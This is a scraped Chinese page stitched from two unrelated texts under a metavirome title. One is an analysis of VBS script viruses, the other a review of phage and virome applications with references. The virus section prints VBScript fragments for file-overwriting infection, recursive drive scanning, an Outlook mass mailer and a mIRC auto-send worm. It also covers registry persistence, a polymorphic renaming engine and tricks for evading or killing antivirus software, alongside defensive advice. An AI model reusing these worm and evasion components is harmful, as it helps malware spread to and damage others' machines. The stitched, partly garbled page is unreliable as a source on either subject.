宏病毒組分析方法

❶ VBS腳本病毒的病毒原理分析

1．vbs腳本病毒如何感染、搜索文件
VBS腳本病毒一般是直接通過自我復制來感染文件的，病毒中的絕大部分代碼都可以直接附加在其他同類程序的中間，譬如新歡樂時光病毒可以將自己的代碼附加在.htm文件的尾部，並在頂部加入一條調用病毒代碼的語句，而宏病毒則是直接生成一個文件的副本，將病毒代碼拷入其中，並以原文件名作為病毒文件名的前綴，vbs作為後綴。下面我們通過宏病毒的部分代碼具體分析一下這類病毒的感染和搜索原理：
以下是文件感染的部分關鍵代碼：
Set fso=createobject(scripting.filesystemobject)
'創建一個文件系統對象
set self=fso.opentextfile(wscript.scriptfullname,1)
'讀打開當前文件（即病毒本身）
vbs=self.readall
' 讀取病毒全部代碼到字元串變數vbs……
set ap=fso.opentextfile(目標文件.path,2,true)
' 寫打開目標文件，准備寫入病毒代碼
ap.write vbs ' 將病毒代碼覆蓋目標文件
ap.close
set cop=fso.getfile(目標文件.path) '得到目標文件路徑
cop.(目標文件.path & .vbs)
' 創建另外一個病毒文件（以.vbs為後綴）
目標文件.delete(true)
'刪除目標文件
上面描述了病毒文件是如何感染正常文件的：首先將病毒自身代碼賦給字元串變數vbs，然後將這個字元串覆蓋寫到目標文件，並創建一個以目標文件名為文件名前綴、vbs為後綴的文件副本，最後刪除目標文件。
下面我們具體分析一下文件搜索代碼：
'該函數主要用來尋找滿足條件的文件，並生成對應文件的一個病毒副本
sub scan(folder_) 'scan函數定義，
on error resume next '如果出現錯誤，直接跳過，防止彈出錯誤窗口
set folder_=fso.getfolder(folder_)
set files=folder_.files ' 當前目錄的所有文件集合
for each file in filesext=fso.GetExtensionName(file)
'獲取文件後綴
ext=lcase(ext) '後綴名轉換成小寫字母
if ext=mp5 then '如果後綴名是mp5，則進行感染。
請自己建立相應後綴名的文件，最好是非正常後綴名 ，以免破壞正常程序。
Wscript.echo (file)
end ifnextset subfolders=folder_.subfoldersfor each subfolder in subfolders '搜索其他目錄；遞歸調用
scan( ) scan(subfolder)
next
end sub
上面的代碼就是VBS腳本病毒進行文件搜索的代碼分析。搜索部分scan( )函數做得比較短小精悍，非常巧妙，採用了一個遞歸的演算法遍歷整個分區的目錄和文件。
2．vbs腳本病毒通過網路傳播的幾種方式及代碼分析
VBS腳本病毒之所以傳播范圍廣，主要依賴於它的網路傳播功能，一般來說，VBS腳本病毒採用如下幾種方式進行傳播：
1）通過Email附件傳播
這是一種用的非常普遍的傳播方式，病毒可以通過各種方法拿到合法的Email地址，最常見的就是直接取outlook地址簿中的郵件地址，也可以通過程序在用戶文檔（譬如htm文件）中搜索Email地址。
下面我們具體分析一下VBS腳本病毒是如何做到這一點的：
Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = CreateObject(Outlook.Application)
//創建一個OUTLOOK應用的對象
If outlookApp= Outlook Then
Set mapiObj=outlookApp.GetNameSpace(MAPI)
//獲取MAPI的名字空間
Set addrList= mapiObj.AddressLists
//獲取地址表的個數
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count
//獲取每個地址表的Email記錄數
For addrEntIndex= 1 To addrEntCount
//遍歷地址表的Email地址
Set item = outlookApp.CreateItem(0)
//獲取一個郵件對象實例
Set addrEnt = addr.AddressEntries(addrEntIndex)
//獲取具體Email地址
= addrEnt.Address
//填入收信人地址
item.Subject = 病毒傳播實驗
//寫入郵件標題
item.Body = 這里是病毒郵件傳播測試，收到此信請不要慌張！
//寫入文件內容
Set attachMents=item.Attachments //定義郵件附件
attachMents.Add fileSysObj.GetSpecialFolder(0)& est.jpg.vbs
item.DeleteAfterSubmit = True
//信件提交後自動刪除
Then
item.Send
//發送郵件
shellObj.regwrite HKCUsoftwareMailtestmailed, 1
//病毒標記，以免重復感染
End If
NextEnd IfNext
End if
End Function
2）通過區域網共享傳播
區域網共享傳播也是一種非常普遍並且有效的網路傳播方式。一般來說，為了區域網內交流方便，一定存在不少共享目錄，並且具有可寫許可權，譬如win2000創建共享時，默認就是具有可寫許可權。這樣病毒通過搜索這些共享目錄，就可以將病毒代碼傳播到這些目錄之中。
在VBS中，有一個對象可以實現網上鄰居共享文件夾的搜索與文件操作。我們利用該對象就可以達到傳播的目的。
welcome_msg = 網路連接搜索測試
Set WSHNetwork = WScript.CreateObject(WScript.Network)
』創建一個網路對象
Set oPrinters = WshNetwork.EnumPrinterConnections
』創建一個網路列印機連接列表
WScript.Echo Network printer mappings:
For i = 0 to oPrinters.Count - 1Step2
』顯示網路列印機連接情況
WScript.Echo Port &oPrinters.Item(i)
& = & oPrinters.Item(i+1)
Next
Set colDrives = WSHNetwork.EnumNetworkDrives
』創建一個網路共享連接列表
If colDrives.Count = 0 Then
MsgBox 沒有可列出的驅動器。,
vbInformation + vbOkOnly,welcome_msg
Else
strMsg = 當前網路驅動器連接: &CRLF
Fori=0To colDrives.Count - 1 Step 2
strMsg = strMsg & Chr(13)&Chr(10)&colDrives(i)
& Chr(9)&colDrives(i+1)
Next
MsgBox strMsg, vbInformation + vbOkOnly,
welcome_msg』顯示當前網路驅動器連接
End If
上面是一個用來尋找當前列印機連接和網路共享連接並將它們顯示出來的完整腳本程序。在知道了共享連接之後，我們就可以直接向目標驅動器讀寫文件了。
3）通過感染htm、asp、jsp、php等網頁文件傳播
如今，WWW服務已經變得非常普遍，病毒通過感染htm等文件，勢必會導致所有訪問過該網頁的用戶機器感染病毒。
病毒之所以能夠在htm文件中發揮強大功能，採用了和絕大部分網頁惡意代碼相同的原理。基本上，它們採用了相同的代碼，不過也可以採用其它代碼，這段代碼是病毒FSO,WSH等對象能夠在網頁中運行的關鍵。在注冊表HKEY_CLASSES_ROOTCLSID下我們可以找到這么一個主鍵，注冊表中對它他的說明是「Windows Script Host Shell Object」，同樣，我們也可以找到，注冊表對它的說明是「FileSystem Object」，一般先要對COM進行初始化，在獲取相應的組件對象之後，病毒便可正確地使用FSO、WSH兩個對象，調用它們的強大功能。代碼如下所示：
Set Apple0bject = document.applets(KJ_guest)Apple0bject.setCLSID()Apple0bject.createInstance() 』創建一個實例
Set WsShell Apple0bject.Get0bject()
Apple0bject.setCLSID()
Apple0bject.createInstance()
』創建一個實例
Set FSO = Apple0bject.Get0bject()
對於其他類型文件，這里不再一一分析。
4）通過IRC聊天通道傳播
病毒通過IRC傳播一般來說採用以下代碼（以MIRC為例）
Dim mirc
set fso=CreateObject(Scripting.FileSystemObject)
set mirc=fso.CreateTextFile(C:mircscript.ini)
』創建文件script.ini
fso.CopyFile Wscript.ScriptFullName, C:mircattachment.vbs,
True 』將病毒文件備份到attachment.vbs
mirc.WriteLine [script]
mirc.WriteLine n0=on 1:join:*.*:
{if($nick !=$me) /dcc send $nick C:mircattachment.vbs }
'利用命令/ddc send $nick attachment.vbs給通道中的其他用戶傳送病毒文件
mirc.Close
以上代碼用來往Script.ini文件中寫入一行代碼，實際中還會寫入很多其他代碼。Script.ini中存放著用來控制IRC會話的命令，這個文件裡面的命令是可以自動執行的。譬如，TUNE.VBS病毒就會修改c:mircscript.ini 和 c:mircmirc.ini，使每當IRC用戶使用被感染的通道時都會收到一份經由DDC發送的TUNE.VBS。同樣，如果Pirch98已安裝在目標計算機的c:pirch98目錄下，病毒就會修改c:pirch98events.ini和c:pirch98pirch98.ini，使每當IRC用戶使用被感染的通道時都會收到一份經由DDC發送的TUNE.VBS。
另外病毒也可以通過現在廣泛流行的KaZaA進行傳播。病毒將病毒文件拷貝到KaZaA的默認共享目錄中，這樣，當其他用戶訪問這台機器時，就有可能下載該病毒文件並執行。這種傳播方法可能會隨著KaZaA這種點對點共享工具的流行而發生作用。
還有一些其他的傳播方法，我們這里不再一一列舉。
3．VBS腳本病毒如何獲得控制權
如何獲取控制權？這一個是一個比較有趣的話題，而VBS腳本病毒似乎將這個話題發揮的淋漓盡致。筆者在這里列出幾種典型的方法：
1）修改注冊表項
windows在啟動的時候，會自動載入HKEY_LOCAL_項下的各鍵值所執向的程序。腳本病毒可以在此項下加入一個鍵值指向病毒程序，這樣就可以保證每次機器啟動的時候拿到控制權。vbs修改注冊表的方法比較簡單，直接調用下面語句即可。 wsh.RegWrite(strName, anyvalue [,strType])
2）通過映射文件執行方式
譬如，我們新歡樂時光將dll的執行方式修改為wscript.exe。甚至可以將exe文件的映射指向病毒代碼。
3）欺騙用戶，讓用戶自己執行
這種方式其實和用戶的心理有關。譬如，病毒在發送附件時，採用雙後綴的文件名，由於默認情況下，後綴並不顯示，舉個例子，文件名為beauty.jpg.vbs的vbs程序顯示為beauty.jpg，這時用戶往往會把它當成一張圖片去點擊。同樣，對於用戶自己磁碟中的文件，病毒在感染它們的時候，將原有文件的文件名作為前綴，vbs作為後綴產生一個病毒文件，並刪除原來文件，這樣，用戶就有可能將這個vbs文件看作自己原來的文件運行。
4）desktop.ini和folder.htt互相配合
這兩個文件可以用來配置活動桌面，也可以用來自定義文件夾。如果用戶的目錄中含有這兩個文件，當用戶進入該目錄時，就會觸發folder.htt中的病毒代碼。這是新歡樂時光病毒採用的一種比較有效的獲取控制權的方法。並且利用folder.htt，還可能觸發exe文件，這也可能成為病毒得到控制權的一種有效方法！
病毒獲得控制權的方法還有很多，這方面作者發揮的餘地也比較大。
4．vbs腳本病毒對抗反病毒軟體的幾種技巧
病毒要生存，對抗反病毒軟體的能力也是必需的。一般來說，VBS腳本病毒採用如下幾種對抗反病毒軟體的方法：
1）自加密
譬如，新歡樂時光病毒，它可以隨機選取密鑰對自己的部分代碼進行加密變換，使得每次感染的病毒代碼都不一樣，達到了多態的效果。這給傳統的特徵值查毒法帶來了一些困難。病毒也還可以進一步的採用變形技術，使得每次感染後的加密病毒的解密後的代碼都不一樣。
下面看一個簡單的vbs腳本變形引擎(來自flyshadow)
Randomize
Set Of = CreateObject(Scripting.FileSystemObject)
』創建文件系統對象
vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall
』讀取自身代碼
fS=Array(Of, vC, fS, fSC)
』定義一個即將被替換字元的數組
For fSC = 0 To 3
vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65))
& Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65))
& Chr((Int(Rnd * 22) + 65)))
』取4個隨機字元替換數組fS中的字元串
Next
Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC 』將替換後的代碼寫迴文件
上面這段代碼使得該VBS文件在每次運行後，其Of，vC，fS，fSC四字元串都會用隨機字元串來代替，這在很大程度上可以防止反病毒軟體用特徵值查毒法將其查出。
2）巧妙運用Execute函數
用過VBS程序的朋友是否會覺得奇怪：當一個正常程序中用到了FileSystemObject對象的時候，有些反病毒軟體會在對這個程序進行掃描的時候報告說此Vbs文件的風險為高，但是有些VBS腳本病毒同樣採用了FileSystemObject對象，為什麼卻又沒有任何警告呢？原因很簡單，就是因為這些病毒巧妙的運用了Execute方法。有些殺毒軟體檢測VBS病毒時，會檢查程序中是否聲明使用了FileSystemObject對象，如果採用了，這會發出報警。如果病毒將這段聲明代碼轉化為字元串，然後通過Execute(String)函數執行，就可以躲避某些反病毒軟體。
3）改變某些對象的聲明方法
譬如fso=createobject(scripting.filesystemobject)，我們將其改變為
fso=createobject(script+ing.filesyste+mobject)，這樣反病毒軟體對其進行靜態掃描時就不會發現filesystemobject對象。
4）直接關閉反病毒軟體
VBS腳本功能強大，它可以直接在搜索用戶進程然後對進程名進行比較，如果發現是反病毒軟體的進程就直接關閉，並對它的某些關鍵程序進行刪除。
5．Vbs病毒生產機的原理介紹
所謂病毒生產機就是指可以直接根據用戶的選擇產生病毒源代碼的軟體。在很多人看來這或許不可思議，其實對腳本病毒而言它的實現非常簡單。
腳本語言是解釋執行的、不需要編譯，程序中不需要什麼校驗和定位，每條語句之間分隔得比較清楚。這樣，先將病毒功能做成很多單獨的模塊，在用戶做出病毒功能選擇後，生產機只需要將相應的功能模塊拼湊起來，最後再作相應的代碼替換和優化即可。由於篇幅關系和其他原因，這里不作詳細介紹。
三、如何防範vbs腳本病毒
1．如何從樣本中提取（加密）腳本病毒
對於沒有加密的腳本病毒，我們可以直接從病毒樣本中找出來，現在介紹一下如何從病毒樣本中提取加密VBS腳本病毒，這里我們以新歡樂時光為例。
用JediEdit打開folder.htt。我們發現這個文件總共才93行，第一行，幾行注釋後，以開始，節尾。相信每個人都知道這是個什麼類型的文件吧！
第87行到91行，是如下語句：
87：
第87和91行不用解釋了，第88行是一個字元串的賦值，很明顯這是被加密過的病毒代碼。看看89行最後的一段代碼ThisText = ThisText & TempChar，再加上下面那一行，我們肯定能夠猜到ThisText裡面放的是病毒解密代碼（熟悉vbs的兄弟當然也可以分析一下這段解密代碼，too simple!就算完全不看代碼也應該可以看得出來的)。第90行是執行剛才ThisText中的那段代碼（經過解密處理後的代碼）。
那麼，下一步該怎麼做呢？很簡單，我們只要在病毒代碼解密之後，將ThisText的內容輸出到一個文本文件就可以解決了。由於上面幾行是vbscript,於是我創建了如下一個.txt文件：
首先，第88、89兩行到剛才建立的.txt文件，當然如果你願意看看新歡樂時光的執行效果，你也可以在最後輸入第90行。然後在下面一行輸入創建文件和將ThisText寫入文件vbs代碼，整個文件如下所示：
ExeString = Afi...』 第88行代碼
Execute(Dim KeyAr... 』 第89行代碼
set fso=createobject(scripting.filesystemobject)
』 創建一個文件系統對象
set virusfile=fso.createtextfile(resource.log,true)
』 創建一個新文件resource.log，
用以存放解密後的病毒代碼 virusfile.writeline(ThisText)
』 將解密後的代碼寫入resource.log
OK！就這么簡單，保存文件，將該文件後綴名.txt改為.vbs(.vbe也可以)，雙擊，你會發現該文件目錄下多了一個文件resource.log，打開這個文件，怎麼樣？是不是「新歡樂時光」的源代碼啊！
2．vbs腳本病毒的弱點
vbs腳本病毒由於其編寫語言為腳本，因而它不會像PE文件那樣方便靈活，它的運行是需要條件的（不過這種條件默認情況下就具備了）。筆者認為，VBS腳本病毒具有如下弱點：
1）絕大部分VBS腳本病毒運行的時候需要用到一個對象：FileSystemObject
2）VBScript代碼是通過Windows Script Host來解釋執行的。
3）VBS腳本病毒的運行需要其關聯程序Wscript.exe的支持。
4）通過網頁傳播的病毒需要ActiveX的支持
5）通過Email傳播的病毒需要OE的自動發送郵件功能支持，但是絕大部分病毒都是以Email為主要傳播方式的。
3．如何預防和解除vbs腳本病毒
針對以上提到的VBS腳本病毒的弱點，筆者提出如下集中防範措施：
1）禁用文件系統對象FileSystemObject
方法：用regsvr32 scrrun.dll /u這條命令就可以禁止文件系統對象。其中regsvr32是WindowsSystem下的可執行文件。或者直接查找scrrun.dll文件刪除或者改名。
還有一種方法就是在注冊表中HKEY_CLASSES_ROOTCLSID下找到一個主鍵的項，咔嚓即可。
2）卸載Windows Scripting Host
在Windows 98中（NT 4.0以上同理），打開[控制面板]→[添加/刪除程序]→[Windows安裝程序]→[附件]，取消「Windows Scripting Host」一項。
和上面的方法一樣，在注冊表中HKEY_CLASSES_ROOTCLSID下找到一個主鍵的項，咔嚓。
3）刪除VBS、VBE、JS、JSE文件後綴名與應用程序的映射
點擊[我的電腦]→[查看]→[文件夾選項]→[文件類型]，然後刪除VBS、VBE、JS、JSE文件後綴名與應用程序的映射。
4）在Windows目錄中，找到WScript.exe，更改名稱或者刪除，如果你覺得以後有機會用到的話，最好更改名稱好了，當然以後也可以重新裝上。
5）要徹底防治VBS網路蠕蟲病毒，還需設置一下你的瀏覽器。我們首先打開瀏覽器，單擊菜單欄里「Internet 選項」安全選項卡里的[自定義級別]按鈕。把「ActiveX控制項及插件」的一切設為禁用，這樣就不怕了。呵呵，譬如新歡樂時光的那個ActiveX組件如果不能運行，網路傳播這項功能就玩完了。
6）禁止OE的自動收發郵件功能
7）由於蠕蟲病毒大多利用文件擴展名作文章，所以要防範它就不要隱藏系統中已知文件類型的擴展名。Windows默認的是「隱藏已知文件類型的擴展名稱」，將其修改為顯示所有文件類型的擴展名稱。
8）將系統的網路連接的安全級別設置至少為「中等」，它可以在一定程度上預防某些有害的Java程序或者某些ActiveX組件對計算機的侵害。
9）呵呵，最後一項不說大家也應該知道了，殺毒軟體確實很必要，盡管有些殺毒軟體挺讓廣大用戶失望，不過，選擇是雙方的哦。在這個病毒橫飛的網路，如果您的機器沒有裝上殺毒軟體我覺得確實挺不可思議的。
四、對所有腳本類病毒發展的展望
隨著網路的飛速發展，網路蠕蟲病毒開始流行，而VBS腳本蠕蟲則更加突出，不僅數量多，而且威力大。由於利用腳本編寫病毒比較簡單，除了將繼續流行目前的VBS腳本病毒外，將會逐漸出現更多的其它腳本類病毒，譬如PHP，JS，Perl病毒等。但是腳本並不是真正病毒技術愛好者編寫病毒的最佳工具，並且腳本病毒解除起來比較容易、相對容易防範。筆者認為，腳本病毒仍將繼續流行，但是能夠具有像宏病毒、新歡樂時光那樣大影響的腳本蠕蟲病毒只是少數。

❷ 宏病毒組學｜病毒組的應用

噬菌體在自然環境中的意義在於它們能夠在宿主體內復制，從而影響細菌群落的多樣性，在人體內，噬菌體的作用是保護人體免受致病菌的侵襲；海水中含有4´1030種病毒，這使其成為最大的噬菌體庫；土壤噬菌體具有影響其養分循環及植物根系與細菌之間的共生關系的功能。在人工環境中，噬菌體介導細菌生長的能力可以被開發為多種用途，由於其特殊性導致它們可以輕易地被基因改造；在廢水處理中，噬菌體可以用來影響現有的細菌群落，從而提高處理效率；在工業上，噬菌體的應用主要為控制食源性病原體和減少石油工業中問題細菌的數量(圖1)。

病毒組在農業領域的應用

最初，噬菌體療法主要應用在醫學領域，即對感染人類的相關致病細菌進行治療。40至50年前，噬菌體療法作為控制植物病原體的手段，在農業環境中被廣泛探索。在這些試驗中出現了兩個主要問題: (1)病原菌產生的胞外多糖阻止了噬菌體的吸附，(2)菌株之間存在不同程度的敏感性。隨著對病毒組學研究的深入，使用噬菌體療法來控制植物性細菌病原體的生長已經被越來越多地探索。近年來，在土壤-植物(作物/蔬菜/果樹)體系中引入「農業噬菌體療法」(agricultural phage therapy)來滅活致病細菌的研究也得到了發展(圖2)。顯而易見，噬菌體療法(也稱為噬菌體生物防治)的一個優點便是減少了對病原體使用化學制劑，這避免了與環境污染、生態系統破壞和作物殘留化學物質有關的問題。

土壤「病」了，給農作物供應再多養分也沒有意義，土壤微生態失衡被視為農業領域亟待解決的重要難題。青枯菌( Ralstonia solanacearum )是世界范圍內最具有毀滅性的植物病原菌之一，由於其致死性和持久性強，並且具有廣泛的宿主范圍以及廣闊的地理分布，受該菌侵襲的土壤經常發生作物減產，甚至絕收的情況，由此造成的經濟損失不可估量。 Akiko Fujiwara 等研究發現溶解性噬菌體(FRSL1)對青枯菌具有生物防治作用( Akiko Fujiwara , et al, 2011 )(圖3)。

當然，為了提高噬菌體在生物防治中的抗菌效果，必須深入了解噬菌體生態學以及各種環境下噬菌體與宿主之間復雜的相互作用。這些噬菌體及其宿主細菌的基因組信息將有助於了解噬菌體的特性、噬菌體與細菌相互作用的歷史和分子機制。

病毒組在生態環境領域的應用

從大的方面來講，環境病毒的生態功能主要有三方面( 王光華， 2017 )(1)調控寄主群落結構。眾所周知，自然生態系統中有兩種主要現象調控微生物群落結構，即從底向上(Bottom-up)和從上而下(Top-down)的兩個生態過程( Lenoir L,et al, 2007 and  Thomas WC, et al, 2013)。噬菌體調控細菌群落結構是一種經典的 Top-down 調控，雖然學術界意識到該調控作用的重要性，但目前對這一調控過程的研究還處於黑箱狀態，已有的報道主要是針對特定噬菌體及其寄主的動態變化( Ashelford K E, et al, 2009 )，尚缺乏群落水平的研究結果。Allen( Allen B, et al, 2013 )等人以茶提取物作為噬菌體抑制劑添加到阿拉斯加土壤中，發現添加茶提取物在顯著降低土壤中噬菌體數量的同時，也增加了微生物生物量和土壤呼吸速率，但該文對細菌群落結構是否產生影響沒有報道。(2)直接或間接參與元素地球化學循環。病毒的這種作用體現在它的感染率、致死率、病毒的周轉時間以及其巨大病毒數量上。病毒感染在引起寄主細胞死亡裂解的同時，也促發寄主細胞營養元素釋放到環境中去，進而促進了元素的生物化學循環，這種由病毒介導的食物鏈傳遞方式叫做 Viral loop。有報道指出，在海洋中由病毒推動的碳環量占該生態系統碳循環總量的6%—26%( Weinbauer MG ， 2004 )。但與此相對應的土壤病毒，特別是土壤噬菌體在多大程度上促進了元素循環還未見報道。(3)作為基因水平移動的媒介。這個功能不難理解，正是病毒與寄主的共進化推動了地球生物群落不斷演替，形成了如此多樣性的地球生態系統( Thingstad TF, et al, 1997 )。

在調控寄主群落結構方面，通過噬菌體控制細菌宿主，並以此減緩耐抗生素細菌的繁殖，受到越來越多的關注。在與細菌共同進化了數十億年之後，噬菌體擁有了獨特的感染宿主的能力，這使其能夠在對微生物群落的其他部分幾乎沒有影響的前提下，控制有問題的細菌。與抗生素或殺菌劑不同，噬菌體可以繼續復制並感染目標細菌，因此，部分學者認為可將基於噬菌體的微生物控制應用領域擴展到生態環境保護，比如在廢水處理時減緩廢水處理廠(wastewater treatment Plants,WWTPs)中耐抗生素細菌(antibiotic-resistant bacteria, ARB)的擴散。通常分離的窄價(narrow-host-range)噬菌體的感染性在加入到活性污泥後就會迅速下降，而多價(broad-host-range)噬菌體在活性污泥的微觀世界中增殖極快，特別是當與它們的其宿主一起加入時。Pedro等利用非致病性生產宿主(Pseudomonas putida)培養多價噬菌體(PER01和PER02)，並測試宿主噬菌體混合物在活性污泥微環境中抑制耐多葯(耐內醯胺)大腸桿菌NDM-1的能力，此外，他們對窄價大腸桿菌噬菌體雞尾酒(MER01和MER02)也進行了測試，以作為對照(圖4)。研究發現在抑制耐抗生素細菌模型方面，多價噬菌體雞尾酒(PER01和PER02)明顯比窄價大腸桿菌雞尾酒(MER01 and MER02)更有效。在實驗中， β -耐乳糖大腸桿菌NDM-1的最初濃度為6.2±0.1 log10 CFU(菌落形成單位colony-forming units)/mL，5天後，經多價噬菌體雞尾酒處理的NDM-1濃度顯著降低至3.8±0.2 log10 CFU/mL，而大腸桿菌雞尾酒處理後濃度為4.7±0.3 log10 CFU/mL。由於存在替代宿主，多價噬菌體能夠達到更大的密度，以增加耐抗生素細菌感染的可能性。含有blaNDM-1抗性基因且存活的大腸桿菌的比例(0.57±0.07)顯著低於對照組(0.74±0.08)。因此，由非致病性宿主安全生產的多價噬菌體可以提供一種新的方法來控制廢水處理廠中的耐抗生素細菌，並減緩相關耐葯基因在環境中的繁殖和釋放(圖4)。

不僅如此，Pedro等的研究結果表明，多價噬菌體可以特異性控制目標細菌，而對活性污泥的活性幾乎沒有影響(以耗氧量衡量)。重要的是，多價噬菌體可以利用多個宿主，因此可以避免在生產過程中需要利用病原性或難以培養的宿主。傳統的窄價噬菌體必須使用細菌靶標來生產，這可能產生重大的安全問題。此外，由於多價噬菌體可以在良性宿主中產生，因此在使用前可能不需要從宿主中提純它們(圖5)，從而大大節省了資金和運營成本。

與任何抗菌劑一樣，噬菌體必須達到足夠的濃度(即必須達到適當的噬菌體與宿主的比例，也稱為感染復數(multiplicity of infection,MOI)，才能確保有效的微生物控制。然而，廢水中活性污泥組成非常復雜，在感染宿主之前，噬菌體可能會因吸附污泥絮凝體、懸浮顆粒和共生菌而被去除。此外，環境壓力，如太陽輻射和極端溫度、鹽度和pH值，也可能減少噬菌體數量和阻礙感染。總的來說，噬菌體的效價是兩個相反過程的結果：生產性感染後的噬菌體復制和各種應激源引起的噬菌體衰變，表明噬菌體在增殖和抑制廢水處理廠(wastewater treatment Plants,WWTPs )耐抗生素細菌(antibiotic-resistant bacteria,ARB)方面的能力仍需增強，這對於減少耐抗生素細菌對環境的排放是極為重要的。

也有研究通過對比宿主特異性性噬菌體、噬菌體雞尾酒和多價噬菌體三者對土壤中ARPB和ARGs的抑制效果。發現在各種噬菌體處理中，雞尾酒噬菌體對土壤和胡蘿卜組織中ARPB/ARG耗散作用最顯著，其次是多價噬菌體和宿主特異性噬菌體處理，但是多價噬菌體在維持土壤和胡蘿卜組織中微生物群落的生態功能方面優於雞尾酒噬菌體處理(圖6) ( Ye Mao,  et al, 2017 )。

病毒組在醫葯領域的應用

噬菌體療法指的是將噬菌體作為生物制劑來殺滅目標細菌。溶解性噬菌體開始感染宿主時，吸附在細菌宿主表面的特定受體上，這些受體可能位於革蘭氏陽性或陰性細胞壁，以及多糖膠囊，甚至附屬物如菌毛和鞭毛上。噬菌體和細菌受體之間的鎖鑰關系通常決定了病毒能夠感染的宿主范圍，具有特徵性的噬菌體受體的數量也在不斷增加。吸附後，病毒將其遺傳物質釋放到宿主體內，大多數與人類病原體相關的裂解噬菌體屬於尾狀病毒科和微病毒科，具有雙鏈或單鏈DNA基因組( Lin DM , et al, 2017 )。接下來，病毒接管細菌的復制機制，創造下一代噬菌體，復制持續到噬菌體編碼的蛋白質被激活，以裂解細胞，有效地殺死宿主，並允許新合成的病毒逃逸，重新啟動周期。盡管噬菌體不是活的有機體，但它們確實是動態的實體，而溶解周期是噬菌體療法的基石。相比之下，抗生素是一種只能選擇性破壞細菌某些生理過程(如蛋白質或細胞壁合成)的化學物質，和噬菌體的作用機制存在很大的差異(表1)。1915年和1917年噬菌體被發現後( O』Flaherty S, et al, 2009 )，即被提議用於治療人類細菌感染。目前，已經證實了實驗性噬菌體治療由革蘭氏陰性菌(包括銅綠假單胞菌，伯克霍爾德氏菌( Burkholderia cenocepacia )和肺炎克雷伯菌( Klebsiella pneumoniae )所引起肺炎的有效性( O』Flaherty S, et al, 2009)，動物模型也證明噬菌體可以作為注射劑來治療全身敗血症感染，而應用噬菌體治療人類局部感染也取得了成功的結果( Rhoads DD , et al, 2009 and Wright A)。隨著其在治療中補充或替代抗生素的潛力的推進，預計未來將有更多的臨床試驗和多樣化的應用。

甲氧西林金黃色葡萄球菌(MRSA)引起的呼吸道感染可發展為致命的全身感染，噬菌體療法有望對這些嚴重感染有效。在利用噬菌體對嚴重敗血症的葡萄球菌呼吸道感染進行治療時發現，噬菌體S130的使用總體上降低了金黃色葡萄球菌密度，並且在不同組織(例如肝，脾，血和肺)中存在顯著的噬菌體復制，實驗小鼠感染後6小時腹腔注射噬菌體可減輕其感染的嚴重程度。在肺中，噬菌體裂解可能在沒有生物分子抑制的情況下發生，因為在肺中檢測到顯著更高的噬菌體濃度。此外，在肺支氣管肺泡灌洗液(bronchoalveolar lavage fluid,BALF)的噬菌體裂解實驗中未觀察到抑製作用。這些結果可能的解釋為：金黃色葡萄球菌在小鼠模型的肺中分布不均勻，並且在肺組織的選擇中存在取樣偏差。而在一位左脛骨感染了XDR Acinetobacter baumannii 和 MDR Klebsiella pneumoniae的病例中，噬菌體和抗生素進行的聯合治療能有效對其症狀進行控制( Ran N P ， et al, 2009 )。

人類剛剛開始擴展噬菌體的用途，尚存在一些技術上的困難( O』Flaherty S, et al, 2009and Lu TK, et al, 2011 )。例如，與將任何葯劑配製成半固體劑型(如乳膏或軟膏)，將噬菌體摻入轉移載體中使得整個最終產品具有均勻性是非常重要的，這確保了葯物的一致性。另一方面，與其他葯物不同，噬菌體是依賴於其結構完整性的大型生物實體，它們的尾巴也有一定的生物功能。最近在歐洲的PhagoBurn臨床試驗( Jault P , et al, 2019)中觀察到噬菌體結構完整性對於治療應用是非常重要的，據報道，噬菌體治療效果不佳，可能是由於在制備治療敷料期間對病毒的物理損傷造成的(圖7)。噬菌體給葯導致某些受試者產生噬菌體中和抗體，可能也會使噬菌體治療無法達到預期的效果。為了促進噬菌體療法的多功能臨床應用，噬菌體和噬菌體療法的研究應旨在通過開發基於現代科學技術的下一代噬菌體療法來克服技術障礙，在本書特別篇——噬菌體療法中會進行詳細分析。

傳統培養方法只能以已知的病毒為目標，很難發現新病毒，而宏病毒組的方法則結合了新一代測序技術以及隨機PCR技術，能夠挖掘大量未知病毒， 而且不需要分離培養，這為部分高分散、低豐度的病毒系統分析和鑒定提供了新的途徑。我國擁有十分豐富的生物資源，在病毒領域的挖掘潛力極大，這對於我國的宏病毒組學研究是一種得天獨厚的優勢，研究人員藉助宏病毒組學的方法已成功地從不同環境樣本（人體、自然及人工環境）中鑒定出了多種病毒，這使人們了解到不同的病毒構成及其中間宿主的病毒攜帶狀況，不僅豐富了病毒庫，同時也增加了人們對病毒分布以及多樣性的認識，進而更能有效地防治病毒的侵襲。此外，利用宏病毒組實時去監控致病性病毒及潛在致病病毒的變化情況，有助於分析新的或尚不明病原體的疾病，對快速檢驗突發的病毒性公共衛生事件意義重大。

未來在病毒組學方面，宏病毒基因組學將成為強力工具。目前，環境中病毒功能探索僅僅局限於序列篩選。但隨著測序技術等新技術的發展，宏病毒組學足以更廣泛和精確地應用在病毒相關領域。總之，宏病毒組學的發展必將突破傳統技術瓶頸，在未來展現其的優勢。

參考文獻

Allen B, Willner D, Oechel WC, et al. Top-down control of microbial activity and biomass in an Arctic soilecosystem. Environmental Microbiology, 2009, 12(3): 642-648.

Ashelford KE, Fry J C, BaileyM J, et al. Characterization of six bacteriophages of Serratia liquefaciens CP6isolated from sugar beet phytosphere. Applied and Environmental Microbiology,1999, 65(5): 1959-1965.

BatinovicS, Wassef F, Knowler SA, et al. Bacteriophages inNatural and Artificial Environments[J]. Pathogens. 2019,8(3).

Fujiwara A, Fujisawa M, Hamasaki R, et al. Biocontrol of Ralstoniasolanacearum by treatment with lytic bacteriophages[J]. Appl Environ Microbiol.2011 Jun;77(12):4155-62.

Gordillo Altamirano FL, BarrJJ. Phage Therapy in the Postantibiotic Era. Clin Microbiol Rev. 2019 Apr;32(2)pii: 32/2/e00066-18.

Jault P, Leclerc T, Jennes S,et al. Efficacyand tolerability of a cocktail of bacteriophages to treat burn wounds infectedby Pseudomonas aeruginosa (PhagoBurn): A randomised, controlled, double-blindphase 1/2 trial. Lancet Infect. Dis. 2019, 19, 35–45.

